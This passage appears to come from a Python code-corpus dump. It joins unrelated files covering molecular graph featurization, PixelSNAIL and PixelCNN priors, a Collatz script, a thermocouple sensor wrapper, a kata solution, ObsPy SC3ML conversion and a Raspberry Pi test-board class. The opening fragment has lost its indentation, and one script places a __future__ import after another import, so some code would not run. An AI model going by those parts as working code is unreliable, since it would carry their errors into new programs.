bond_feature += [0]
if self.bond_stereo:
bond_feature += [0]*len(self.bond_stereo_types)
if self.shortest_path:
path_len = len(rdmolops.GetShortestPath(mol, int(a), int(b))) - 1
bond_feature += to_one_hot(path_len - 1, range(self.max_path_length))
if self.same_ring:
ring_info = list(mol.GetRingInfo().AtomRings())
membership = [int(a) in r and int(b) in r for r in ring_info]
if sum(membership) > 0:
bond_feature += [1]
else:
bond_feature += [0]
if self.autoencoder:
# noinspection PyUnboundLocalVariable
bond_feature += [target[:, 0][edge_count]]
else:
if self.bond_type:
bond_feature += [0]
bond_feature += to_one_hot(bond.GetBondTypeAsDouble(), self.bond_types)
if self.conjugated:
bond_feature += [bond.GetIsConjugated()]
if self.bond_ring:
bond_feature += [bond.IsInRing()]
if self.bond_stereo:
bond_feature += to_one_hot(bond.GetStereo(), self.bond_stereo_types)
if self.shortest_path:
path_len = len(rdmolops.GetShortestPath(mol, int(a), int(b))) - 1
bond_feature += to_one_hot(path_len - 1, range(self.max_path_length))
if self.same_ring:
ring_info = list(mol.GetRingInfo().AtomRings())
membership = [int(a) in r and int(b) in r for r in ring_info]
if sum(membership) > 0:
bond_feature += [1]
else:
bond_feature += [0]
if self.autoencoder:
bond_feature += [target[:, 0][edge_count]]
edge_count += 1
edge_features.append(bond_feature)
data.edge_attr = torch.tensor(edge_features, dtype=torch.float)
# Vertex features
# List to hold all vertex features
vertex_features = []
pt = Chem.GetPeriodicTable()
if self.partial_charge:
rdPartialCharges.ComputeGasteigerCharges(mol)
mmff_p = None
if self.mmff_atom_types_one_hot:
# AllChem.EmbedMolecule(mol, maxAttempts=100000)
# AllChem.MMFFOptimizeMolecule(mol)
mmff_p = rdForceFieldHelpers.MMFFGetMoleculeProperties(mol)
if self.assign_stereo:
rdmolops.AssignStereochemistryFrom3D(mol)
for i in range(num_atoms):
atom = mol.GetAtomWithIdx(i)
atom_feature = []
if self.atomic_num:
atom_feature += to_one_hot(atom.GetAtomicNum(), self.atom_types)
if self.valence:
atom_feature += to_one_hot(atom.GetTotalValence(), self.valence_types)
if self.aromatic:
atom_feature += [atom.GetIsAromatic()]
if self.hybridization:
atom_feature += to_one_hot(atom.GetHybridization(), self.hybridization_types)
if self.partial_charge:
gc = float(atom.GetProp('_GasteigerCharge'))
if not np.isfinite(gc):
gc = 0.0
atom_feature += [gc]
if self.formal_charge:
atom_feature += to_one_hot(atom.GetFormalCharge(), self.charge_types)
if self.r_covalent:
atom_feature += [pt.GetRcovalent(atom.GetAtomicNum())]
if self.r_vanderwals:
atom_feature += [pt.GetRvdw(atom.GetAtomicNum())]
if self.default_valence:
atom_feature += to_one_hot(pt.GetDefaultValence(atom.GetAtomicNum()), self.valence_types)
if self.rings:
atom_feature += [atom.IsInRingSize(r) for r in range(3, self.max_ring_size + 1)]
if self.chirality:
atom_feature += to_one_hot(atom.GetChiralTag(), self.chi_types)
if self.mmff_atom_types_one_hot:
if mmff_p is None:
atom_feature += [0] * len(self.mmff94_atom_types)
else:
atom_feature += to_one_hot(mmff_p.GetMMFFAtomType(i), self.mmff94_atom_types)
if self.degree:
atom_feature += to_one_hot(atom.GetDegree(), self.degree_types)
if self.num_hydrogen:
atom_feature += to_one_hot(atom.GetTotalNumHs(), self.num_hydrogen_types)
if self.num_radical_electron:
atom_feature += to_one_hot(atom.GetNumRadicalElectrons(), self.num_radical_electron_types)
vertex_features.append(atom_feature)
data.x = torch.tensor(vertex_features, dtype=torch.float)
# UID
data.uid = torch.tensor([int(self.metadata[idx]['uid'])])
if self.improved_architecture:
# Vertex features
v_in = data.x
padding = torch.zeros([self.max_atoms, v_in.shape[1]])
padding[:v_in.shape[0], :] = v_in
v_in = padding
# Mask
mask = torch.tensor([1. if x < num_atoms else 0. for x in range(self.max_atoms)])
# Edge features
k = 0
e_in = torch.zeros([num_atoms, num_atoms, data.edge_attr.shape[1]])
for i, j in itertools.combinations(np.arange(num_atoms), 2):
e_in[i, j, :] = data.edge_attr[k, :]
e_in[j, i, :] = data.edge_attr[k, :]
k += 1
padding = torch.zeros([self.max_atoms, self.max_atoms, data.edge_attr.shape[1]])
padding[:e_in.shape[0], :e_in.shape[0], :] = e_in
e_in = padding
# Target
target = data.y
padding = torch.zeros([self.max_atoms*self.max_atoms - self.max_atoms, data.y.shape[1]])
padding[:target.shape[0], :] = target
target = padding
return v_in, e_in, mask, target
else:
return data
def __repr__(self) -> str:
return '{}({})'.format(self.__class__.__name__, len(self))
class CNFDataset(Dataset):
    """
    Dataset class for loading atomic pairwise distance information for molecules
    for a conditional normalizing flow.

    Each item is a zero-padded pairwise distance vector, a zero-padded condition
    matrix, and the true (pre-padding) number of pairwise distances.
    """

    def __init__(self, metadata: List[Dict[str, str]], padding_dim: int = 528, condition_dim: int = 256):
        """
        :param metadata: Metadata; each entry must supply 'path' (distance matrix
            file) and 'condition' (saved NumPy condition matrix).
        :param padding_dim: Padding size for all distance vectors and conditions.
        :param condition_dim: Dimensionality of the hidden size for the condition matrix.
        """
        # Bug fix: the original called super(Dataset, self).__init__(), which
        # starts the MRO lookup *after* Dataset and therefore skips the direct
        # base class entirely. Plain super() initializes the base correctly.
        super().__init__()
        self.metadata = metadata
        self.padding_dim = padding_dim
        self.condition_dim = condition_dim

    def __len__(self) -> int:
        """Return the number of molecules in the dataset."""
        return len(self.metadata)

    def __getitem__(self, idx: int) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:
        """
        :param idx: # of data item to retrieve.
        :return: Padded distance vector, condition matrix, and # of pairwise distances in the molecule.
        """
        # Load the pairwise distance matrix and flatten it to a vector
        _, data = distmat_to_vec(self.metadata[idx]['path'])
        dist_vec = torch.from_numpy(data)
        # noinspection PyTypeChecker
        dist_vec = dist_vec.type(torch.float32)
        # Number of pairwise distances before padding (lets consumers mask the padding)
        num_dist = torch.tensor(dist_vec.shape[0])
        # Zero-pad the pairwise distances vector to a fixed length
        padding = torch.zeros(self.padding_dim)
        padding[:dist_vec.shape[0]] = dist_vec
        dist_vec = padding
        # Load the condition matrix
        condition = np.load(self.metadata[idx]['condition'])
        condition = torch.from_numpy(condition)
        # noinspection PyTypeChecker
        condition = condition.type(torch.float32)
        # Zero-pad the condition matrix to a fixed shape
        padding = torch.zeros([self.padding_dim, self.condition_dim])
        padding[0:condition.shape[0], :] = condition
        condition = padding
        return dist_vec, condition, num_dist

    def __repr__(self) -> str:
        return '{}({})'.format(self.__class__.__name__, len(self))
| StarcoderdataPython |
3487832 | import matplotlib.pyplot as plt
from __future__ import print_function
import numpy as np
import umap
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader
import torch.optim as optim
import torchvision.datasets as datasets
import torchvision.transforms as transforms
from torchvision.utils import make_grid
from tqdm import tqdm
from math import sqrt
from vqvae import VQVAE
def preprocess(x, n_bits):
    """Map discrete latents in [0, 2**n_bits) to model space [-1, 1] as floats."""
    levels = 2 ** n_bits - 1
    # normalize to [0, 1] given the quantization, then shift to [-1, 1]
    return x.float() / levels * 2 - 1
def deprocess(x, n_bits):
    """Map model space [-1, 1] back to discrete latents [0, 2**n_bits) as longs."""
    levels = 2 ** n_bits - 1
    # shift to [0, 1], rescale to the codebook range, then truncate to long
    return ((x + 1) / 2 * levels).long()
# ==============
# PixelSNAIL top prior
# ==============
def down_shift(x):
    """Shift a (B, C, H, W) map one pixel down, zero-filling the top row."""
    top_zeros = torch.zeros_like(x[:, :, :1, :])
    return torch.cat([top_zeros, x[:, :, :-1, :]], dim=2)
def right_shift(x):
    """Shift a (B, C, H, W) map one pixel right, zero-filling the left column."""
    left_zeros = torch.zeros_like(x[:, :, :, :1])
    return torch.cat([left_zeros, x[:, :, :, :-1]], dim=3)
def concat_elu(x):
    """CReLU-style nonlinearity: concatenate x and -x on channels, then ELU."""
    return F.elu(torch.cat((x, -x), dim=1))
class Conv2d(nn.Conv2d):
    """nn.Conv2d with weight normalization applied at construction time."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Reparameterize the kernel as magnitude * direction (weight norm).
        nn.utils.weight_norm(self)
class DownConv(Conv2d):
    """Row-causal convolution: pads the top so outputs only see pixels above."""
    def forward(self, x):
        kh, kw = self.kernel_size
        side = (kw - 1) // 2
        # symmetric left/right padding, full causal padding on top, none below
        padded = F.pad(x, (side, side, kh - 1, 0))
        return super().forward(padded)
class DownRightConv(Conv2d):
    """Row-and-column-causal convolution: pads top and left edges only."""
    def forward(self, x):
        kh, kw = self.kernel_size
        # full causal padding on the left and the top, none on right/bottom
        padded = F.pad(x, (kw - 1, 0, kh - 1, 0))
        return super().forward(padded)
class GatedResLayer(nn.Module):
    """Gated residual layer (PixelCNN++-style).

    Two convolutions around a concat-ELU nonlinearity; the second conv's
    output is split into (a, b) and combined as ``x + a * sigmoid(b)``.
    Optionally takes an auxiliary input ``a`` through a 1x1 shortcut conv and
    a conditioning vector ``y`` through a linear projection.
    """
    def __init__(self, conv, n_channels, kernel_size, drop_rate=0, shortcut_channels=None, n_cond_classes=None, relu_fn=concat_elu):
        super().__init__()
        self.relu_fn = relu_fn
        # relu_fn (concat_elu) doubles the channel count, hence 2*n_channels in.
        self.c1 = conv(2*n_channels, n_channels, kernel_size)
        if shortcut_channels:
            self.c1c = Conv2d(2*shortcut_channels, n_channels, kernel_size=1)
        if drop_rate > 0:
            self.dropout = nn.Dropout(drop_rate)
        # c2 outputs 2*n_channels so the result can be chunked into (a, b).
        self.c2 = conv(2*n_channels, 2*n_channels, kernel_size)
        if n_cond_classes:
            self.proj_y = nn.Linear(n_cond_classes, 2*n_channels)
    def forward(self, x, a=None, y=None):
        c1 = self.c1(self.relu_fn(x))
        if a is not None: # shortcut connection if auxiliary input 'a' is given
            c1 = c1 + self.c1c(self.relu_fn(a))
        c1 = self.relu_fn(c1)
        if hasattr(self, 'dropout'):
            c1 = self.dropout(c1)
        c2 = self.c2(c1)
        if y is not None:
            # Transpose so the projected class vector broadcasts over the
            # channel dim, add it, then transpose back.
            c2=c2.transpose(1,3)
            c2 += self.proj_y(y)[:,:,None]
            c2=c2.transpose(1,3)
        a, b = c2.chunk(2,1)
        out = x + a * torch.sigmoid(b)
        return out
def causal_attention(k, q, v, mask, nh, drop_rate, training):
    """Multi-head attention over flattened spatial positions with a causal mask.

    ``k``/``q`` are (B, dq, H, W), ``v`` is (B, dv, H, W); ``mask`` broadcasts
    to (B, nh, HW, HW) with zeros at disallowed positions. Returns (B, dv, H, W).
    """
    B, dq, H, W = q.shape
    dv = v.shape[1]
    n_pos = H * W
    dqh, dvh = dq // nh, dv // nh
    # Split channels into heads, flatten spatial dims, and scale the queries.
    q_heads = q.reshape(B, nh, dqh, n_pos) * dqh ** -0.5
    k_heads = k.reshape(B, nh, dqh, n_pos)
    v_heads = v.reshape(B, nh, dvh, n_pos)
    # (B, nh, HW, dqh) @ (B, nh, dqh, HW) -> (B, nh, HW, HW)
    logits = q_heads.transpose(2, 3) @ k_heads
    logits = F.dropout(logits, p=drop_rate, training=training, inplace=True)
    logits = logits.masked_fill(mask == 0, -1e10)
    weights = F.softmax(logits, -1)
    # (B, nh, HW, HW) @ (B, nh, HW, dvh) -> (B, nh, HW, dvh)
    attn = weights @ v_heads.transpose(2, 3)
    attn = attn.transpose(2, 3)  # (B, nh, dvh, HW)
    return attn.reshape(B, -1, H, W)  # (B, dv, H, W)
class AttentionGatedResidualLayer(nn.Module):
    """A stack of causal gated residual layers followed by causal self-attention.

    Keys/values are computed from the layer input, the residual-stack output,
    and the fixed positional ``background``; queries come from the stack output
    and the background only. The attention output re-enters through a gated
    shortcut projection.
    """
    def __init__(self, n_channels, n_background_ch, n_res_layers, n_cond_classes, drop_rate, nh, dq, dv,
                 attn_drop_rate):
        super().__init__()
        # attn params
        self.nh = nh
        self.dq = dq
        self.dv = dv
        self.attn_drop_rate = attn_drop_rate
        self.input_gated_resnet = nn.ModuleList([
            *[GatedResLayer(DownRightConv, n_channels, (2, 2), drop_rate, None, n_cond_classes) for _ in
              range(n_res_layers)]])
        self.in_proj_kv = nn.Sequential(
            GatedResLayer(Conv2d, 2 * n_channels + n_background_ch, 1, drop_rate, None, n_cond_classes),
            Conv2d(2 * n_channels + n_background_ch, dq + dv, 1))
        self.in_proj_q = nn.Sequential(
            GatedResLayer(Conv2d, n_channels + n_background_ch, 1, drop_rate, None, n_cond_classes),
            Conv2d(n_channels + n_background_ch, dq, 1))
        self.out_proj = GatedResLayer(Conv2d, n_channels, 1, drop_rate, dv, n_cond_classes)
    def forward(self, x, background, attn_mask, y=None):
        ul = x
        for m in self.input_gated_resnet:
            ul = m(ul, y=y)
        # k/v see input + stack output + positional background; q omits x.
        kv = self.in_proj_kv(torch.cat([x, ul, background], 1))
        k, v = kv.split([self.dq, self.dv], 1)
        q = self.in_proj_q(torch.cat([ul, background], 1))
        attn_out = causal_attention(k, q, v, attn_mask, self.nh, self.attn_drop_rate, self.training)
        return self.out_proj(ul, attn_out)
class PixelSNAIL(nn.Module):
    """PixelSNAIL-style autoregressive prior over the top-level latent codes.

    Causally shifted convolutions feed a stack of attention-gated residual
    layers; the head outputs per-pixel logits over the 2**n_bits code values.
    """
    def __init__(self, input_dims, n_channels, n_res_layers, n_out_stack_layers, n_cond_classes, n_bits,
                 attn_n_layers=4, attn_nh=8, attn_dq=16, attn_dv=128, attn_drop_rate=0, drop_rate=0.5, **kwargs):
        super().__init__()
        H, W = input_dims[2]
        # init background: fixed 2-channel positional encoding (centered
        # vertical/horizontal coordinate maps), stored as a non-trainable buffer.
        background_v = ((torch.arange(H, dtype=torch.float) - H / 2) / 2).view(1, 1, -1, 1).expand(1, 1, H, W)
        background_h = ((torch.arange(W, dtype=torch.float) - W / 2) / 2).view(1, 1, 1, -1).expand(1, 1, H, W)
        self.register_buffer('background', torch.cat([background_v, background_h], 1))
        # init attention mask over current and future pixels
        attn_mask = torch.tril(torch.ones(1, 1, H * W, H * W),
                               diagonal=-1).byte()  # 1s below diagonal -- attend to context only
        self.register_buffer('attn_mask', attn_mask)
        # input layers for `up` and `up and to the left` pixels
        self.ul_input_d = DownConv(2, n_channels, kernel_size=(1, 3))
        self.ul_input_dr = DownRightConv(2, n_channels, kernel_size=(2, 1))
        self.ul_modules = nn.ModuleList([
            *[AttentionGatedResidualLayer(n_channels, self.background.shape[1], n_res_layers, n_cond_classes, drop_rate,
                                          attn_nh, attn_dq, attn_dv, attn_drop_rate) for _ in range(attn_n_layers)]])
        self.output_stack = nn.Sequential(
            *[GatedResLayer(DownRightConv, n_channels, (2, 2), drop_rate, None, n_cond_classes) \
              for _ in range(n_out_stack_layers)])
        self.output_conv = Conv2d(n_channels, 2 ** n_bits, kernel_size=1)
    def forward(self, x, y=None):
        # add channel of ones to distinguish image from padding later on
        x = F.pad(x, (0, 0, 0, 0, 0, 1), value=1)
        # combine the row-causal and row+column-causal input streams
        ul = down_shift(self.ul_input_d(x)) + right_shift(self.ul_input_dr(x))
        for m in self.ul_modules:
            ul = m(ul, self.background.expand(x.shape[0], -1, -1, -1), self.attn_mask, y)
        ul = self.output_stack(ul)
        return self.output_conv(F.elu(ul)).unsqueeze(2)  # out (B, 2**n_bits, 1, H, W)
# =============
# PixelCNN bottom prior
# =============
def pixelcnn_gate(x):
    """Gated activation: split channels into halves (a, b) -> tanh(a) * sigmoid(b)."""
    a, b = torch.chunk(x, 2, dim=1)
    return torch.tanh(a) * torch.sigmoid(b)
class MaskedConv2d(nn.Conv2d):
    """Conv2d whose kernel is masked so outputs never see current/future pixels.

    mask_type 'a' (first layer) also zeroes the center tap; 'b' keeps it.
    The mask is re-applied on every forward pass so optimizer updates cannot
    un-zero the masked weights.
    """
    def __init__(self, mask_type, *args, **kwargs):
        self.mask_type = mask_type
        super().__init__(*args, **kwargs)
    def apply_mask(self):
        kh, kw = self.kernel_size
        w = self.weight.data
        w[:, :, kh // 2 + 1:, :] = 0         # rows strictly below the center
        w[:, :, kh // 2, kw // 2 + 1:] = 0   # right of center in the center row
        if self.mask_type == 'a':
            w[:, :, kh // 2, kw // 2] = 0    # the center pixel itself
    def forward(self, x):
        self.apply_mask()
        return super().forward(x)
class GatedResidualBlock(nn.Module):
    """Gated PixelCNN residual block with separate vertical and horizontal stacks.

    The vertical stack looks at rows above, the horizontal stack at pixels to
    the left; apply_mask() keeps both causal. A conditioning map ``y`` is added
    to both stacks before the gate, and the horizontal stack carries the
    residual connection when in/out channel counts match.
    """
    def __init__(self, in_channels, out_channels, kernel_size, n_cond_channels, drop_rate):
        super().__init__()
        self.residual = (in_channels == out_channels)
        self.drop_rate = drop_rate
        self.v = nn.Conv2d(in_channels, 2 * out_channels, kernel_size, padding=kernel_size // 2)  # vertical stack
        self.h = nn.Conv2d(in_channels, 2 * out_channels, (1, kernel_size),
                           padding=(0, kernel_size // 2))  # horizontal stack
        self.v2h = nn.Conv2d(2 * out_channels, 2 * out_channels, kernel_size=1)  # vertical to horizontal connection
        self.h2h = nn.Conv2d(out_channels, out_channels, kernel_size=1, bias=False)  # horizontal to horizontal
        if n_cond_channels:
            self.in_proj_y = nn.Conv2d(n_cond_channels, 2 * out_channels, kernel_size=1)
        if self.drop_rate > 0:
            self.dropout_h = nn.Dropout(drop_rate)
    def apply_mask(self):
        # Re-applied before every forward pass so gradient updates cannot
        # un-zero the masked taps.
        self.v.weight.data[:, :, self.v.kernel_size[0] // 2:, :].zero_()  # mask out middle row and below
        self.h.weight.data[:, :, :,
                           self.h.kernel_size[1] // 2 + 1:].zero_()  # mask out to the right of the central column
    def forward(self, x_v, x_h, y):
        self.apply_mask()
        # projection of y if included for conditional generation (cf paper section 2.3 -- added before the pixelcnn_gate)
        proj_y = self.in_proj_y(y)
        # vertical stack
        x_v_out = self.v(x_v)
        x_v2h = self.v2h(x_v_out) + proj_y
        x_v_out = pixelcnn_gate(x_v_out)
        # horizontal stack
        x_h_out = self.h(x_h) + x_v2h + proj_y
        x_h_out = pixelcnn_gate(x_h_out)
        if self.drop_rate:
            x_h_out = self.dropout_h(x_h_out)
        x_h_out = self.h2h(x_h_out)
        # residual connection
        if self.residual:
            x_h_out = x_h_out + x_h
        return x_v_out, x_h_out
    def extra_repr(self):
        return 'residual={}, drop_rate={}'.format(self.residual, self.drop_rate)
class PixelCNN(nn.Module):
    """Conditional gated PixelCNN prior over the bottom-level latent codes.

    Conditioned on class labels ``y`` and on the (upsampled) top-level code map
    ``h``; outputs per-pixel logits over the 2**n_bits code values.
    """
    def __init__(self, n_channels, n_out_conv_channels, kernel_size, n_res_layers, n_cond_stack_layers, n_cond_classes,
                 n_bits,
                 drop_rate=0, **kwargs):
        # Bug fix: `partial` is used below but functools is not imported by
        # this file's import block, which would raise NameError at init time.
        from functools import partial
        super().__init__()
        # conditioning layers (bottom prior conditioned on class labels and top-level code)
        self.in_proj_y = nn.Linear(n_cond_classes, 2 * n_channels)
        self.in_proj_h = nn.ConvTranspose2d(1, n_channels, kernel_size=4, stride=2,
                                            padding=1)  # upsample top codes to bottom-level spacial dim
        self.cond_layers = nn.ModuleList([
            GatedResLayer(partial(Conv2d, padding=kernel_size // 2), n_channels, kernel_size, drop_rate, None,
                          n_cond_classes) \
            for _ in range(n_cond_stack_layers)])
        self.out_proj_h = nn.Conv2d(n_channels, 2 * n_channels,
                                    kernel_size=1)  # double channels top apply pixelcnn_gate
        # pixelcnn layers
        self.input_conv = MaskedConv2d('a', 1, 2 * n_channels, kernel_size=7, padding=3)
        self.res_layers = nn.ModuleList([
            GatedResidualBlock(n_channels, n_channels, kernel_size, 2 * n_channels, drop_rate) for _ in
            range(n_res_layers)])
        self.conv_out1 = nn.Conv2d(n_channels, 2 * n_out_conv_channels, kernel_size=1)
        self.conv_out2 = nn.Conv2d(n_out_conv_channels, 2 * n_out_conv_channels, kernel_size=1)
        self.output = nn.Conv2d(n_out_conv_channels, 2 ** n_bits, kernel_size=1)
    def forward(self, x, h=None, y=None):
        # conditioning inputs -- h is top-level codes; y is class labels
        h = self.in_proj_h(h)
        for l in self.cond_layers:
            h = l(h, y=y)
        h = self.out_proj_h(h)
        # project labels and move the channel axis so the addition broadcasts
        y = self.in_proj_y(y)[:, :, None]
        y = y.transpose(1, 3)
        x = pixelcnn_gate(self.input_conv(x) + h + y)
        x_v, x_h = x, x
        for l in self.res_layers:
            x_v, x_h = l(x_v, x_h, y)
        out = pixelcnn_gate(self.conv_out1(x_h))
        out = pixelcnn_gate(self.conv_out2(out))
        return self.output(out).unsqueeze(2)  # (B, 2**n_bits, 1, H, W)
6597961 | <filename>collatz.py
# <NAME>
# Program that asks a user to input any positive integer
# and outputs the successive values of the following calculations:
def collatz_sequence(x):
    """Return the successive Collatz values for a positive integer x.

    The list excludes x itself and ends with 1; an input of 1 yields an
    empty list (matching the original script's output).

    :raises ValueError: if x is not positive. The original script only
        rejected negatives, so an input of 0 looped forever printing 0.
    """
    if x < 1:
        raise ValueError("x must be a positive integer")
    values = []
    while x != 1:
        # Floor division stays in exact integer arithmetic; the original
        # int(x / 2) round-trips through a float and can lose precision
        # for very large integers.
        x = x // 2 if x % 2 == 0 else 3 * x + 1
        values.append(x)
    return values


if __name__ == '__main__':
    x = int(input("Please enter a positive integer: "))
    if x < 1:
        print("Please start the program again and enter POSITIVE integer!")
    else:
        seq = collatz_sequence(x)
        if seq:
            # Same space-separated output format as the original script.
            print(*seq, end=" ")
1669881 | import Adafruit_GPIO.SPI as SPI
import Adafruit_MAX31855.MAX31855 as MAX31855
class TempMAX31855:
    """Wrapper around a MAX31855 thermocouple sensor (hardware or bit-banged SPI)."""

    # Class-wide count of constructed sensors; each instance records its index.
    numSensor = 0

    def __init__(self, spi, tempSensorId, clk=None, cs=None, do=None):
        """
        :param spi: "hardware" for the Pi's hardware SPI bus, "gpio" for
            software (bit-banged) SPI on the given pins.
        :param tempSensorId: Identifier used for logging.
        :param clk: Clock GPIO pin (required when spi == "gpio").
        :param cs: Chip-select GPIO pin (required when spi == "gpio").
        :param do: Data-out GPIO pin (required when spi == "gpio").
        :raises ValueError: if spi is neither "hardware" nor "gpio".
        """
        if spi == "hardware":
            # Raspberry Pi hardware SPI configuration.
            SPI_PORT = 0
            SPI_DEVICE = 0
            self.sensor = MAX31855.MAX31855(spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE))
        elif spi == "gpio":
            self.sensor = MAX31855.MAX31855(clk, cs, do)
        else:
            # Bug fix: the original printed "ABORT!!!" and kept constructing,
            # leaving self.sensor unset and deferring the failure to
            # readTempC(). Fail fast instead.
            raise ValueError("Unknown spi mode %r: expected 'hardware' or 'gpio'" % (spi,))
        self.tempSensorId = tempSensorId
        self.sensorNum = TempMAX31855.numSensor
        TempMAX31855.numSensor += 1
        print("Constructing MAX31855 sensor %s" % (tempSensorId))

    def readTempC(self):
        """Return the current thermocouple temperature in degrees Celsius."""
        return self.sensor.readTempC()
3277615 | """
https://www.codewars.com/kata/576bb71bbbcf0951d5000044/train/python
Given an array of ints, return array where 1st el is the count of positives, the 2nd el is sum of negatives.
"""
def count_positives_sum_negatives(arr):
    """
    Return [count of positive numbers, sum of negative numbers] for arr.

    Falsy inputs (empty list, None) are returned unchanged, per the kata's
    requirement to return the input itself for empty/None arrays.
    """
    if not arr:
        return arr
    # Generator expressions avoid materializing two intermediate lists.
    return [sum(1 for num in arr if num > 0), sum(num for num in arr if num < 0)]
def count_positives_sum_negatives2(arr):
    """
    Single-pass variant: return [positive count, sum of non-positives],
    or the input itself when it is empty/None.
    """
    if not arr:
        return arr
    positives, negative_total = 0, 0
    for value in arr:
        if value > 0:
            positives += 1
        else:
            # Zeros fall through here but contribute nothing to the sum.
            negative_total += value
    return [positives, negative_total]
| StarcoderdataPython |
1942638 | <reponame>earthinversion/Fnet_IRIS_data_automated_download
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
sc3ml events read and write support.
:author:
EOST (École et Observatoire des Sciences de la Terre)
:copyright:
The ObsPy Development Team (<EMAIL>)
:license:
GNU Lesser General Public License, Version 3
(https://www.gnu.org/copyleft/lesser.html)
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from future.builtins import * # NOQA
import io
import os
import re
from lxml import etree
from obspy.io.quakeml.core import Pickler, Unpickler, _xml_doc_from_anything
from obspy.io.seiscomp.core import validate as validate_sc3ml
SCHEMA_VERSION = ['0.5', '0.6', '0.7', '0.8', '0.9']
def _read_sc3ml(filename, id_prefix='smi:org.gfz-potsdam.de/geofon/'):
    """
    Read a 0.9 SC3ML file and returns a :class:`~obspy.core.event.Catalog`.
    An XSLT file is used to convert the SC3ML file to a QuakeML file. The
    catalog is then generated using the QuakeML module.
    .. warning::
        This function should NOT be called directly, it registers via the
        the :meth:`~obspy.core.event.catalog.Catalog.write` method of an
        ObsPy :class:`~obspy.core.event.catalog.Catalog` object, call this
        instead.
    :type filename: str
    :param filename: SC3ML file to be read.
    :type id_prefix: str
    :param id_prefix: ID prefix. SC3ML does not enforce any particular ID
        restriction, this ID prefix allows to convert the IDs to a well
        formatted QuakeML ID. You can modify the default ID prefix with the
        reverse DNS name of your institute.
    :rtype: :class:`~obspy.core.event.Catalog`
    :return: An ObsPy Catalog object.
    .. rubric:: Example
    >>> from obspy import read_events
    >>> cat = read_events('/path/to/iris_events.sc3ml')
    >>> print(cat)
    2 Event(s) in Catalog:
    2011-03-11T05:46:24.120000Z | +38.297, +142.373
    2006-09-10T04:26:33.610000Z | +9.614, +121.961
    """
    sc3ml_doc = _xml_doc_from_anything(filename)
    # The root tag's XML namespace embeds the schema version, e.g.
    # "{http://geofon.gfz-potsdam.de/ns/seiscomp3-schema/0.9}seiscomp".
    match = re.match(
        r'{http://geofon\.gfz-potsdam\.de/ns/seiscomp3-schema/([-+]?'
        r'[0-9]*\.?[0-9]+)}', sc3ml_doc.tag)
    try:
        version = match.group(1)
    except AttributeError:
        # match is None: the namespace is not a SeisComP3 schema at all.
        raise ValueError("Not a SC3ML compatible file or string.")
    else:
        if version not in SCHEMA_VERSION:
            message = ("Can't read SC3ML version %s, ObsPy can deal with "
                       "versions [%s].") % (
                version, ', '.join(SCHEMA_VERSION))
            raise ValueError(message)
    # One XSLT stylesheet per supported schema version converts SC3ML to
    # QuakeML 1.2, which the QuakeML Unpickler can parse.
    xslt_filename = os.path.join(os.path.dirname(__file__), 'data',
                                 'sc3ml_%s__quakeml_1.2.xsl' % version)
    transform = etree.XSLT(etree.parse(xslt_filename))
    quakeml_doc = transform(sc3ml_doc,
                            ID_PREFIX=etree.XSLT.strparam(id_prefix))
    return Unpickler().load(io.BytesIO(quakeml_doc))
def _write_sc3ml(catalog, filename, validate=False, verbose=False,
                 event_removal=False, **kwargs):  # @UnusedVariable
    """
    Write a SC3ML file. Since a XSLT file is used to write the SC3ML file from
    a QuakeML file, the catalog is first converted in QuakeML.
    .. warning::
        This function should NOT be called directly, it registers via the
        the :meth:`~obspy.core.event.catalog.Catalog.write` method of an
        ObsPy :class:`~obspy.core.event.catalog.Catalog` object, call this
        instead.
    :type catalog: :class:`~obspy.core.event.catalog.Catalog`
    :param catalog: The ObsPy Catalog object to write.
    :type filename: str or file
    :param filename: Filename to write or open file-like object.
    :type validate: bool
    :param validate: If True, the final SC3ML file will be validated against
        the SC3ML schema file. Raises an AssertionError if the validation
        fails.
    :type verbose: bool
    :param verbose: Print validation error log if True.
    :type event_removal: bool
    :param event_removal: If True, the event elements will be removed. This can
        be useful to associate origins with scevent when injecting SC3ML file
        into seiscomp.
    """
    nsmap_ = getattr(catalog, "nsmap", {})
    # Serialize to QuakeML first; the XSLT stylesheet then converts
    # QuakeML 1.2 -> SC3ML 0.9.
    quakeml_doc = Pickler(nsmap=nsmap_).dumps(catalog)
    xslt_filename = os.path.join(os.path.dirname(__file__), 'data',
                                 'quakeml_1.2__sc3ml_0.9.xsl')
    transform = etree.XSLT(etree.parse(xslt_filename))
    sc3ml_doc = transform(etree.parse(io.BytesIO(quakeml_doc)))
    # Remove events
    if event_removal:
        for event in sc3ml_doc.xpath("//*[local-name()='event']"):
            event.getparent().remove(event)
    if validate and not validate_sc3ml(io.BytesIO(sc3ml_doc), verbose=verbose):
        raise AssertionError("The final SC3ML file did not pass validation.")
    # Open filehandler or use an existing file like object
    try:
        with open(filename, 'wb') as fh:
            fh.write(sc3ml_doc)
    except TypeError:
        # `filename` is already an open file-like object.
        filename.write(sc3ml_doc)
| StarcoderdataPython |
6661251 | # Copyright (c) 2017
#
# All rights reserved.
#
# This file is distributed under the Clear BSD license.
# The full text can be found in LICENSE in the root directory.
import ipaddress
import os
import pexpect
from boardfarm.lib import common
from . import openwrt_router
class RPI(openwrt_router.OpenWrtRouter):
    """Raspberry pi board device class with OpenWrtRouter OS installed."""
    model = "rpi3"
    wan_iface = "erouter0"
    lan_iface = "brlan0"
    lan_network = ipaddress.IPv4Network(u"10.0.0.0/24")
    lan_gateway = ipaddress.IPv4Address(u"10.0.0.1")
    uprompt = ["U-Boot>"]
    uboot_eth = "sms0"
    # DDR scratch address that u-boot loads TFTP'd images into before
    # writing them out to the SD card (mmc).
    uboot_ddr_addr = "0x1000000"
    uboot_net_delay = 0
    fdt = "uImage-bcm2710-rpi-3-b.dtb"
    fdt_overlay = "uImage-pi3-disable-bt-overlay.dtb"
    # can't get u-boot to work without a delay
    delaybetweenchar = 0.05
    # allowed open ports (starting point)
    wan_open_ports = ["22", "8080", "8087", "8088", "8090"]
    flash_meta_booted = True
    cdrouter_config = "configs/cdrouter-rdkb.conf"
    def flash_uboot(self, uboot):
        """Flash the Raspberry pi board with the Universal Bootloader image.
        In this case it's flashing the vfat partition of the bootload.
        Need to have that image u-boot and serial turned on via dtoverlay
        for things to work after flashing.
        :param uboot: Indicates the absolute location of the file to be used to flash.
        :type uboot: string
        """
